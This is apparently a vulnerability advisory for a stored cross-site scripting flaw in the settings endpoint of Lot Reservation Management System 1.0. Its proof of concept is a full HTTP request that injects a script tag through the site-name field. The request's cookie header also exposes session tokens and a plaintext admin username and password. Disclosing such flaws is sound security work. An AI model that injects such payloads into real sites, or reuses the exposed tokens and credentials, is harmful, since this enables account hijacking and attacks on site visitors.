[description]
Lot Reservation Management System was discovered to contain a XSS vulnerability via the URI /admin/ajax.php?action=save_settings.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
[Affected Product Code Base]
1.0
[Impact Escalation of Privileges]
true
[POC]
request payload(Pls be aware of the name field):
POST /admin/ajax.php?action=save_settings HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 1612
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhoxIYX3IjU9fyD9z
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/index.php?page=site_settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; PHPSESSID=git91lpt9et0atu8q4dg73890i; layers=5; BatchSelected=null; vcodesum=17; Path=/www/wwwroot/111.com
Connection: keep-alive
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="name"
Lot Reservation Management System"><script>alert(11)</script>
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="email"
info@sample.comm
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="contact"
+6948 8542 623
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="about"
<p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-weight: 400; text-align: justify;"> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p>
------WebKitFormBoundaryhoxIYX3IjU9fyD9z
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryhoxIYX3IjU9fyD9z--
